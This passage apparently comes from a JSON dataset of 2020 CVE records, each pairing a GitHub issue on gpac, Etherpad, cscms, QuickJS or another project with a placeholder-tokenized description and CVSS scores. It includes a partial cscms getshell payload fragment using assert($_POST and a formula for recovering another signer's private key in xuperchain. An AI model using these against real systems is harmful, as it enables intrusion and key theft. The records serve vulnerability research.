        "description": "There is a heap buffer overflow in the APITAG function of APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! \u221a] I looked for a similar issue and couldn't find any. [ \u221a] I tried with the latest version of GPAC. Installers available at URLTAG [ \u221a] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Detailed guidelines: URLTAG A crafted input will lead to crash in isom_intern.c at gpac NUMBERTAG Triggered by APITAG diso POC out /dev/null Poc NUMBERTAG invalid APITAG URLTAG The ASAN information is as follows: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-22675",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1344",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1344",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2019-11-13T05:18:43Z",
        "description": "There is a heap buffer overflow in the APITAG function of APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! \u221a] I looked for a similar issue and couldn't find any. [ \u221a] I tried with the latest version of GPAC. Installers available at URLTAG [ \u221a] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Detailed guidelines: URLTAG A crafted input will lead to crash in stbl_read.c at gpac NUMBERTAG Triggered by APITAG diso POC out /dev/null Poc APITAG heap URLTAG The ASAN information is as follows: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-22677",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1341",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1341",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2019-11-13T03:49:59Z",
        "description": "There is a heap buffer overflow in the dump_data_hex function of APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! \u221a] I looked for a similar issue and couldn't find any. [ \u221a] I tried with the latest version of GPAC. Installers available at URLTAG [ \u221a] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Detailed guidelines: URLTAG A crafted input will lead to crash in box_dump.c at gpac NUMBERTAG Triggered by APITAG diso POC out /dev/null Poc NUMBERTAG heep dump_data NUMBERTAG URLTAG The ASAN information is as follows: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-22678",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1339",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1339",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2019-11-13T03:14:38Z",
        "description": "There is a heap buffer overflow in the APITAG function of APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! \u221a] I looked for a similar issue and couldn't find any. [ \u221a] I tried with the latest version of GPAC. Installers available at URLTAG [ \u221a] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Detailed guidelines: URLTAG A crafted input will lead to crash in av_parsers.c at gpac NUMBERTAG Triggered by APITAG diso POC out /dev/null Poc NUMBERTAG stackoverflow APITAG mat NUMBERTAG URLTAG The ASAN information is as follows: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-22679",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1345",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1345",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2019-11-13T05:25:14Z",
        "description": "There are memory leaks in the sgpd_parse_entry function of APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! \u221a] I looked for a similar issue and couldn't find any. [ \u221a] I tried with the latest version of GPAC. Installers available at URLTAG [ \u221a] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Detailed guidelines: URLTAG A crafted input will lead to crash in box_code_base.c at gpac NUMBERTAG Triggered by APITAG diso POC out /dev/null Poc NUMBERTAG memleak sgpd_parse_entry URLTAG The ASAN information is as follows: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-22741",
        "Issue_Url_old": "https://github.com/xuperchain/xuperchain/issues/782",
        "Issue_Url_new": "https://github.com/xuperchain/xuperchain/issues/782",
        "Repo_new": "xuperchain/xuperchain",
        "Issue_Created_At": "2020-04-07T05:11:12Z",
        "description": "one can recover other's private key using multi signature. Brief of the issue One can recover other's private key after collecting other's partial signature in multisignature . logic CODETAG The one who proposal a multisignature knows APITAG he get a partial signature(eg. s2), he can recover corresponding sk2 using \"sk2=(s2 k2)/H(PK,R,m)\". Repo steps NUMBERTAG create contract account CODETAG private keys CODETAG NUMBERTAG generate multisignature transaction CODETAG CODETAG NUMBERTAG collect partial siganture CODETAG NUMBERTAG caculate hash of transactions ERRORTAG NUMBERTAG recover private key ERRORTAG run exploit.go CODETAG Additional information I think no one round multisignature is proven security based schnorr APITAG to BLS signature or just use plain multi signature.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-22761",
        "Issue_Url_old": "https://github.com/flatpressblog/flatpress/issues/64",
        "Issue_Url_new": "https://github.com/flatpressblog/flatpress/issues/64",
        "Repo_new": "flatpressblog/flatpress",
        "Issue_Created_At": "2020-04-19T13:44:03Z",
        "description": "Security Issue: CSRF in APITAG function.. In the source code, the APITAG function is sent via unauthenticated GET method. ( PATHTAG APITAG APITAG APITAG APITAG APITAG The application does not have anti csrf tokens, so it is vulnerable to Cross site Request Forgery attacks. The vulnerability allows delete any file.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-22781",
        "Issue_Url_old": "https://github.com/ether/etherpad-lite/issues/3502",
        "Issue_Url_new": "https://github.com/ether/etherpad-lite/issues/3502",
        "Repo_new": "ether/etherpad-lite",
        "Issue_Created_At": "2018-10-23T16:32:13Z",
        "description": "SQL injection attempts killls Etherpad lite. Hi, On our server we were getting some Etherpad outage. We relied it to a nasty query: ERRORTAG A \"minimal\" query example: ERRORTAG This provoke an immediate crash: ERRORTAG We are running the NUMBERTAG flavor on Debian Stretch with node NUMBERTAG and no specific customization. We reproduced the behavior on two independents Etherpad installation.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-22782",
        "Issue_Url_old": "https://github.com/ether/etherpad-lite/issues/3825",
        "Issue_Url_new": "https://github.com/ether/etherpad-lite/issues/3825",
        "Repo_new": "ether/etherpad-lite",
        "Issue_Created_At": "2020-04-02T18:51:03Z",
        "description": "aborted uploads crash instance?. ERRORTAG Using soffice APITAG Develop branch",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-22808",
        "Issue_Url_old": "https://github.com/fecshop/yii2_fecshop/issues/87",
        "Issue_Url_new": "https://github.com/fecshop/yii2_fecshop/issues/87",
        "Repo_new": "fecshop/yii2_fecshop",
        "Issue_Created_At": "2020-05-20T08:59:08Z",
        "description": "Xss vulnerability. Hi, this is Xcheck team. Our code safety check tool Xcheck has found NUMBERTAG ss vulnerabilities in this object. Here are the detail NUMBERTAG PATHTAG line NUMBERTAG APITAG NUMBERTAG PATHTAG line NUMBERTAG APITAG You can visit this url to verify. APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-22840",
        "Issue_Url_old": "https://github.com/b2evolution/b2evolution/issues/102",
        "Issue_Url_new": "https://github.com/b2evolution/b2evolution/issues/102",
        "Repo_new": "b2evolution/b2evolution",
        "Issue_Created_At": "2020-04-27T13:48:14Z",
        "description": "Multiple vulnerabilies in b2evolution version NUMBERTAG stable. Hi MENTIONTAG We have identified the following vulnerabilities in version NUMBERTAG stable: Open redirect Multiple XSS Please check your mail for more information.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-22848",
        "Issue_Url_old": "https://github.com/chshcms/cscms/issues/6",
        "Issue_Url_new": "https://github.com/chshcms/cscms/issues/6",
        "Repo_new": "chshcms/cscms",
        "Issue_Created_At": "2020-04-13T10:04:37Z",
        "description": "Cscms NUMBERTAG has code execution vulnerability NUMBERTAG APITAG summary Vulnerability APITAG NUMBERTAG has code execution vulnerabilities Report date NUMBERTAG Exploit Author: Zhou Zi Qiao Product Home: FILETAG Software link: FILETAG Version NUMBERTAG APITAG overview Vulnerability PATHTAG Vulnerability function\uff1aindex ERRORTAG Get the id parameter here and assign it to the array $ zdy , and bring it into the function plub_show . this APITAG APITAG APITAG Follow up this function and find that the $ zdy (ie $ fidetpl) we passed in will be analyzed and added to the $ APITAG variable CODETAG There is such a judgment at the end CODETAG $return==FALSE entered the branch and executed $this APITAG APITAG Follow up this function and find that the labelif2 function is called on the first line. Perform some judgments and finally execute the eval function, resulting in code execution. ERRORTAG NUMBERTAG ulnerability exploitation URLTAG FILETAG Front end getshell (need to open the dance section) payload: URLTAG {toif:assert($_POST FILETAG or payload\uff1a URLTAG {toif:assert($_POST FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-22864",
        "Issue_Url_old": "https://github.com/froala/wysiwyg-editor/issues/3880",
        "Issue_Url_new": "https://github.com/froala/wysiwyg-editor/issues/3880",
        "Repo_new": "froala/wysiwyg-editor",
        "Issue_Created_At": "2020-04-16T15:51:52Z",
        "description": "XSS vulnerability in insert video] . Steps to reproduce the problem NUMBERTAG Go to the Official demo [ URLTAG url APITAG on the +] button APITAG on [insert video] button APITAG on APITAG Code] button APITAG the payload CODETAG Recording. [ URLTAG url",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-22874",
        "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/5",
        "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/5",
        "Repo_new": "pcmacdon/jsish",
        "Issue_Created_At": "2020-04-13T14:03:30Z",
        "description": "integer overflow and buffer overflow. Enviroment APITAG poc: ERRORTAG vulnerability description: FILETAG In APITAG len is the length of the Array, and the APITAG is initially set to a maximum value by o.length. After the calculation of the code, nsiz is calculated as a negative number, which can bypass the two checks of line NUMBERTAG and line NUMBERTAG FILETAG APITAG will get a smaller size of heap space, and then memset assigns a value to the space pointed to by APITAG , but this time has exceeded the actual heap range of APITAG , causing heap overflow .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-22875",
        "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/10",
        "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/10",
        "Repo_new": "pcmacdon/jsish",
        "Issue_Created_At": "2020-04-13T14:23:26Z",
        "description": "integer overflow. Enviroment APITAG poc: ERRORTAG The vulnerability code is in line src / APITAG NUMBERTAG the function APITAG , the vulnerability code is as follows: FILETAG The curlen here is also the size of the array, and can be arbitrarily set in the js code, for example in the poc FILETAG The affected code is in the analytic function APITAG , as shown in the figure: FILETAG The actual array size len is larger than APITAG , which triggers the assert.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-22876",
        "Issue_Url_old": "https://github.com/ldarren/QuickJS/issues/11",
        "Issue_Url_new": "https://github.com/ldarren/quickjs/issues/11",
        "Repo_new": "ldarren/quickjs",
        "Issue_Created_At": "2020-04-14T15:21:38Z",
        "description": "stack overflow. Enviroment APITAG poc: ERRORTAG vulnerability description: ASAN:SIGSEGV APITAG NUMBERTAG ERROR: APITAG stack overflow on address NUMBERTAG ffd NUMBERTAG ebfb8 (pc NUMBERTAG fc NUMBERTAG b NUMBERTAG bp NUMBERTAG ffd NUMBERTAG ec NUMBERTAG sp NUMBERTAG ffd NUMBERTAG ebfa0 T NUMBERTAG fc NUMBERTAG b NUMBERTAG in malloc ( PATHTAG NUMBERTAG d NUMBERTAG c in js_def_malloc PATHTAG NUMBERTAG b6c in js_malloc_rt PATHTAG NUMBERTAG b6c in js_mallocz_rt PATHTAG NUMBERTAG b6c in js_mallocz PATHTAG NUMBERTAG e2a NUMBERTAG in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in 